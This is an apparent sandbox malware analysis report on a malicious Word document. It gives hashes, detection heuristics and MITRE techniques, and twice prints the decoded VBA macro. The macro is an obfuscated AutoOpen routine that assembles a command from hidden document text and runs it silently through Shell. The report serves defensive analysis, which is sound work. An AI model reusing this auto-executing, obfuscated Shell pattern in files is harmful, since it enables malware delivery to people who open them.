Office (OLE) malware analysis — malicious · ce127291ef0e6aae

MALICIOUS

Office (OLE)

92.1 KB Created: 2018-11-15 19:21:00 Authoring application: Microsoft Office Word First seen: 2019-02-26

MD5: 4127a7d4814abde1dd62b9ce485f8484 SHA-1: 1ccc34891d977860a50372c27fb56e70937827da SHA-256: ce127291ef0e6aaebff19d99224160b5b0ccc7e8811485b87fab45a381fbadf1

210 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

This document contains VBA macros that utilize the Shell() function to execute a command-line payload. The macro attempts to construct and run a complex command involving multiple environment variable assignments, likely to download and execute a second-stage payload. The presence of AutoOpen and cmd.exe invocation heuristics strongly suggests malicious intent.

Heuristics 7

ClamAV: Doc.Malware.Generic-6750889-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Generic-6750889-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

            "o", "WZ", "o", "fa", "lo", "M", "kw", "zt")
Shell UiOFRXfZ + lUbzoP + ZMnHtP, 0
   sROtT = Array("kS", "b", "pt", "qc", "ha", "HG", "b", "Q", _

AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro

Matched line in script

End Function
Sub AutoOpen()
   RbaKui = Array("dC", "iz", "f", "X", "O", "dD", "z", "H", _

Suspicious cmd.exe invocation with execution flag high SC_STR_CMD

Suspicious cmd.exe invocation with execution flag
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6220 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6220 bytes
SHA-256: `6b85cf174c6de934f2101f54df79574483d6e8f9df173a88c4d98f178897343d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "aJjnTEX" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function MjkYQ() jZFYoM = Array("zA", "i", "w", "zj", "jf", "za", "J", "q", _ "N", "oR", "o", "m", "k", "h", "K", "i", _ "Ez", "QU", "hF", "HM", "D", "Ez", "U", "L", _ "QO", "Ck", "Rw", "T", "wd", "V", "o", "jG", _ "f", "Id", "n", "k", "p", "SB", "kw", "j", _ "QH", "n", "NZ", "ij", "b", "Ej", "jV", "Y", _ "M", "B", "wd", "Pk", "a", "p", "DH", "hQ", _ "wW", "r", "z", "U", "E", "oL", "Et", "K") zwwfQUKtc = Array("ra", "k", "G", "U", "c", "qq", "Li", "pE", _ "KK", "jV", "iT", "I", "RB", "r", "Nf", "M", _ "s", "pS", "H", "U", "mU", "sT", "nb", "B", _ "h", "w", "Oo", "m", "R", "l", "NS", "zR", _ "r", "z", "WX", "IE", "A", "QB", "op", "GD", _ "o", "vU", "iw", "AF", "KD", "J", "Xb", "m", _ "Ob", "f", "kC", "d", "rN", "Cj", "L", "od", _ "DG", "b", "r", "GS", "u", "o", "G", "o") OjMvhTp = Array("R", "GT", "bS", "Cl", "vs", "i", "S", "QP", _ "Pz", "Y", "Yc", "o", "M", "D", "C", "dD", _ "Y", "OB", "d", "zC", "c", "DZ", "Cf", "u", _ "D", "RN", "Q", "pK", "Sp", "tr", "A", "Ev", _ "aa", "M", "Jb", "E", "s", "mT", "RA", "mi", _ "na", "nr", "i", "Bh", "zT", "Pv", "h", "T", _ "F", "a", "G", "I", "zN", "M", "n", "mY", _ "zt", "Cq", "jT", "TW", "Cf", "Y", "WK", "lk") OfRzJHG = Array("z", "Eq", "Ir", "O", "pV", "i", "K", "bo", _ "dz", "w", "m", "FC", "p", "Ij", "Ez", "tT", _ "W", "f", "P", "k", "GT", "Sd", "AZ", "k", _ "d", "BN", "wN", "jA", "h", "VM", "j", "nq", _ "u", "wh", "a", "nu", "pO", "qf", "F", "MC", _ "Aa", "mz", "Qm", "k", "t", "iG", "f", "Vi", _ "oU", "T", "fj", "bD", "on", "ED", "Hd", "B", _ "uU", "B", "Z", "a", "rT", "MF", "S", "R") UiOFRXfZ = "" + TdnMp + dpGZa + Shapes("zcDPvXtD").TextFrame.ContainingRange + dXmjoM + mwhFd NGjaUwjIO = Array("Mw", "c", "c", "R", "jf", "jT", "QV", "TT", _ "k", "M", "ju", "R", "Fa", "YS", "f", "VC", _ "T", "v", "f", "Q", "Ea", "ov", "cc", "w", _ "h", "z", "dE", "K", "Z", "mO", "D", "Ra", _ "wL", "MM", "I", "jr", "bf", "wU", "U", "S", _ "Y", "O", "T", "jX", "AK", "F", "KD", "ml", _ "T", "T", "w", "C", "w", "Mu", "i", "w", _ "o", "WZ", "o", "fa", "lo", "M", "kw", "zt") Shell UiOFRXfZ + lUbzoP + ZMnHtP, 0 sROtT = Array("kS", "b", "pt", "qc", "ha", "HG", "b", "Q", _ "Ks", "jh", "X", "jk", "Zc", "o", "qa", "tH", _ "r", "pj", "s", "Gm", "DT", "Zf", "Rk", "J", _ "s", "H", "GT", "U", "P", "U", "B", "tz", _ "fu", "w", "W", "z", "J", "JN", "z", "zm", _ "mw", "U", "lS", "wX", "A", "Tk", "Ok", "Gl", _ "JE", "W", "Bw", "D", "t", "K", "F", "nN", _ "pK", "q", "z", "dh", "OF", "wz", "VM", "s") wnYjiWRFZ = Array("kG", "ur", "C", "B", "na", "jr", "iS", "fn", _ "Tm", "w", "v", "F", "Gp", "zO", "Rw", "P", _ "PW", "Y", "rs", "ow", "uw", "m", "i", "HG", _ "wj", "ku", "cG", "U", "Q", "Pz", "rC", "C", _ "Q", "fu", "t", "Sn", "D", "B", "n", "nB", _ "P", "Yi", "i", "q", "jm", "nE", "jq", "q", _ "oA", "dO", "H", "wJ", "E", "J", "Ys", "X", _ "t", "m", "AO", "E", "m", "az", "V", "w") zGbrNfqR = Array("bQ", "cF", "Ad", "oH", "L", "oP", "PL", "cs", _ "w", "L", "C", "a", "LX", "o", "J", "O", _ "vk", "Q", "ho", "n", "OP", "ZR", "Gs", "u", _ "wQ", "z", "cp", "j", "u", "S", "rb", "Xo", _ "D", "l", "Z", "wD", "B", "z", "P", "TA", _ "f", "w", "G", "T", "M", "ZH", "V", "X", _ "jf", "Z", "i", "uf", "wj", "z", "a", "sj", _ "l", "P", "LU", "i", "ou", "wo", "o", "sQ") End Function Sub AutoOpen() RbaKui = Array("dC", "iz", "f", "X", "O", "dD", "z", "H", _ "kW", "G", "zS", "iT", "UE", "EV", "ci", "q", _ "Ds", "C", "G", "z", "HD", "w", "H", "ih", _ "jB", "mt", "z", "i", "V", "oz", "T", "Bt", _ "MU", "qi", "A", "uN", "uz", "Ji", "G", "s", _ "h", "Y", "T", "E", "qi", "ov", "M", "t", _ "c", "Q", "Vb", "qD", "SA", "q", "X", "wI", _ "LD", "jD", "DG", "R", "NZ", "jj", "CC", "hc") tqrRnf = Array("sX", "Xz", "aM", "nu", "tw", "V", "Tt", "X", _ "N", "Hd", "di", "qv", "s", "q", "Wz", "q", _ "P", "Z", "N", "k", "M", "tG", "q", "C", _ "W", "wi", "z", "GB", "Sl", "V", "iL", "zT", _ "Pj", "JS", "CT", "Tj", "Gb", "td", "Qb", "M", _ "Rj", "d", "X", "EJ", "jG", "DY", "Gw", "MS", _ "DB", "jp", "nj", "QD", "b", "ON", "ww", "W", _ "ZU", "qE", "K", "fA", "j", "Cj", "hK", "a") MjkYQ GrzJwKrd = Array("tY", "c", "B", "l", "a", "q", "MV", "jK", _ "ki", "bC", "Cj", "cG", "aj", "h", "nT", "XX", _ "i", "So", "f", "LO", "At", "J", "wu", "U", _ "J", "j", "Hi", "qL", "R", "M", "C", "ks", _ "BV", "r", "ap", "Yi", "YZ", "C", "Z", "Vh", _ "Al", "zi", "jr", "z", "C", "TA", "Qm", "R", _ "HI", "s", "QK", "c", "P", "L", "k", "u", _ "t", "E", "k", "Ww", "BK", "I", "Pr", "dc") PZNnZWa = Array("l", "Wz", "V", "M", "h", "dO", "Y", "J", _ "J", "N", "w", "JC", "lm", "SJ", "wn", "w", _ "PN", "B", "cq", "MC", "L", "PN", "B", "z", _ "nK", "PZ", "O", "A", "Z", "E", "uw", "M", _ "UE", "q", "ka", "C", "Ez", "D", "u", "W", _ "ba", "U", "wd", "GB", "Q", "o", "fX", "T", _ "f", "wL", "w", "D", "j", "pa", "l", "G", _ "lt", "ET", "h", "jJ", "Xz", "kH", "c", "Cu") End Sub

SHA-256: 6b85cf174c6de934f2101f54df79574483d6e8f9df173a88c4d98f178897343d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "aJjnTEX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function MjkYQ()
   jZFYoM = Array("zA", "i", "w", "zj", "jf", "za", "J", "q", _
            "N", "oR", "o", "m", "k", "h", "K", "i", _
            "Ez", "QU", "hF", "HM", "D", "Ez", "U", "L", _
            "QO", "Ck", "Rw", "T", "wd", "V", "o", "jG", _
            "f", "Id", "n", "k", "p", "SB", "kw", "j", _
            "QH", "n", "NZ", "ij", "b", "Ej", "jV", "Y", _
            "M", "B", "wd", "Pk", "a", "p", "DH", "hQ", _
            "wW", "r", "z", "U", "E", "oL", "Et", "K")
   zwwfQUKtc = Array("ra", "k", "G", "U", "c", "qq", "Li", "pE", _
            "KK", "jV", "iT", "I", "RB", "r", "Nf", "M", _
            "s", "pS", "H", "U", "mU", "sT", "nb", "B", _
            "h", "w", "Oo", "m", "R", "l", "NS", "zR", _
            "r", "z", "WX", "IE", "A", "QB", "op", "GD", _
            "o", "vU", "iw", "AF", "KD", "J", "Xb", "m", _
            "Ob", "f", "kC", "d", "rN", "Cj", "L", "od", _
            "DG", "b", "r", "GS", "u", "o", "G", "o")
   OjMvhTp = Array("R", "GT", "bS", "Cl", "vs", "i", "S", "QP", _
            "Pz", "Y", "Yc", "o", "M", "D", "C", "dD", _
            "Y", "OB", "d", "zC", "c", "DZ", "Cf", "u", _
            "D", "RN", "Q", "pK", "Sp", "tr", "A", "Ev", _
            "aa", "M", "Jb", "E", "s", "mT", "RA", "mi", _
            "na", "nr", "i", "Bh", "zT", "Pv", "h", "T", _
            "F", "a", "G", "I", "zN", "M", "n", "mY", _
            "zt", "Cq", "jT", "TW", "Cf", "Y", "WK", "lk")
   OfRzJHG = Array("z", "Eq", "Ir", "O", "pV", "i", "K", "bo", _
            "dz", "w", "m", "FC", "p", "Ij", "Ez", "tT", _
            "W", "f", "P", "k", "GT", "Sd", "AZ", "k", _
            "d", "BN", "wN", "jA", "h", "VM", "j", "nq", _
            "u", "wh", "a", "nu", "pO", "qf", "F", "MC", _
            "Aa", "mz", "Qm", "k", "t", "iG", "f", "Vi", _
            "oU", "T", "fj", "bD", "on", "ED", "Hd", "B", _
            "uU", "B", "Z", "a", "rT", "MF", "S", "R")
UiOFRXfZ = "" + TdnMp + dpGZa + Shapes("zcDPvXtD").TextFrame.ContainingRange + dXmjoM + mwhFd
   NGjaUwjIO = Array("Mw", "c", "c", "R", "jf", "jT", "QV", "TT", _
            "k", "M", "ju", "R", "Fa", "YS", "f", "VC", _
            "T", "v", "f", "Q", "Ea", "ov", "cc", "w", _
            "h", "z", "dE", "K", "Z", "mO", "D", "Ra", _
            "wL", "MM", "I", "jr", "bf", "wU", "U", "S", _
            "Y", "O", "T", "jX", "AK", "F", "KD", "ml", _
            "T", "T", "w", "C", "w", "Mu", "i", "w", _
            "o", "WZ", "o", "fa", "lo", "M", "kw", "zt")
Shell UiOFRXfZ + lUbzoP + ZMnHtP, 0
   sROtT = Array("kS", "b", "pt", "qc", "ha", "HG", "b", "Q", _
            "Ks", "jh", "X", "jk", "Zc", "o", "qa", "tH", _
            "r", "pj", "s", "Gm", "DT", "Zf", "Rk", "J", _
            "s", "H", "GT", "U", "P", "U", "B", "tz", _
            "fu", "w", "W", "z", "J", "JN", "z", "zm", _
            "mw", "U", "lS", "wX", "A", "Tk", "Ok", "Gl", _
            "JE", "W", "Bw", "D", "t", "K", "F", "nN", _
            "pK", "q", "z", "dh", "OF", "wz", "VM", "s")
   wnYjiWRFZ = Array("kG", "ur", "C", "B", "na", "jr", "iS", "fn", _
            "Tm", "w", "v", "F", "Gp", "zO", "Rw", "P", _
            "PW", "Y", "rs", "ow", "uw", "m", "i", "HG", _
            "wj", "ku", "cG", "U", "Q", "Pz", "rC", "C", _
            "Q", "fu", "t", "Sn", "D", "B", "n", "nB", _
            "P", "Yi", "i", "q", "jm", "nE", "jq", "q", _
            "oA", "dO", "H", "wJ", "E", "J", "Ys", "X", _
            "t", "m", "AO", "E", "m", "az", "V", "w")
   zGbrNfqR = Array("bQ", "cF", "Ad", "oH", "L", "oP", "PL", "cs", _
            "w", "L", "C", "a", "LX", "o", "J", "O", _
            "vk", "Q", "ho", "n", "OP", "ZR", "Gs", "u", _
            "wQ", "z", "cp", "j", "u", "S", "rb", "Xo", _
            "D", "l", "Z", "wD", "B", "z", "P", "TA", _
            "f", "w", "G", "T", "M", "ZH", "V", "X", _
            "jf", "Z", "i", "uf", "wj", "z", "a", "sj", _
            "l", "P", "LU", "i", "ou", "wo", "o", "sQ")
End Function
Sub AutoOpen()
   RbaKui = Array("dC", "iz", "f", "X", "O", "dD", "z", "H", _
            "kW", "G", "zS", "iT", "UE", "EV", "ci", "q", _
            "Ds", "C", "G", "z", "HD", "w", "H", "ih", _
            "jB", "mt", "z", "i", "V", "oz", "T", "Bt", _
            "MU", "qi", "A", "uN", "uz", "Ji", "G", "s", _
            "h", "Y", "T", "E", "qi", "ov", "M", "t", _
            "c", "Q", "Vb", "qD", "SA", "q", "X", "wI", _
            "LD", "jD", "DG", "R", "NZ", "jj", "CC", "hc")
   tqrRnf = Array("sX", "Xz", "aM", "nu", "tw", "V", "Tt", "X", _
            "N", "Hd", "di", "qv", "s", "q", "Wz", "q", _
            "P", "Z", "N", "k", "M", "tG", "q", "C", _
            "W", "wi", "z", "GB", "Sl", "V", "iL", "zT", _
            "Pj", "JS", "CT", "Tj", "Gb", "td", "Qb", "M", _
            "Rj", "d", "X", "EJ", "jG", "DY", "Gw", "MS", _
            "DB", "jp", "nj", "QD", "b", "ON", "ww", "W", _
            "ZU", "qE", "K", "fA", "j", "Cj", "hK", "a")
MjkYQ
   GrzJwKrd = Array("tY", "c", "B", "l", "a", "q", "MV", "jK", _
            "ki", "bC", "Cj", "cG", "aj", "h", "nT", "XX", _
            "i", "So", "f", "LO", "At", "J", "wu", "U", _
            "J", "j", "Hi", "qL", "R", "M", "C", "ks", _
            "BV", "r", "ap", "Yi", "YZ", "C", "Z", "Vh", _
            "Al", "zi", "jr", "z", "C", "TA", "Qm", "R", _
            "HI", "s", "QK", "c", "P", "L", "k", "u", _
            "t", "E", "k", "Ww", "BK", "I", "Pr", "dc")
   PZNnZWa = Array("l", "Wz", "V", "M", "h", "dO", "Y", "J", _
            "J", "N", "w", "JC", "lm", "SJ", "wn", "w", _
            "PN", "B", "cq", "MC", "L", "PN", "B", "z", _
            "nK", "PZ", "O", "A", "Z", "E", "uw", "M", _
            "UE", "q", "ka", "C", "Ez", "D", "u", "W", _
            "ba", "U", "wd", "GB", "Q", "o", "fX", "T", _
            "f", "wL", "w", "D", "j", "pa", "l", "G", _
            "lt", "ET", "h", "jJ", "Xz", "kH", "c", "Cu")
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.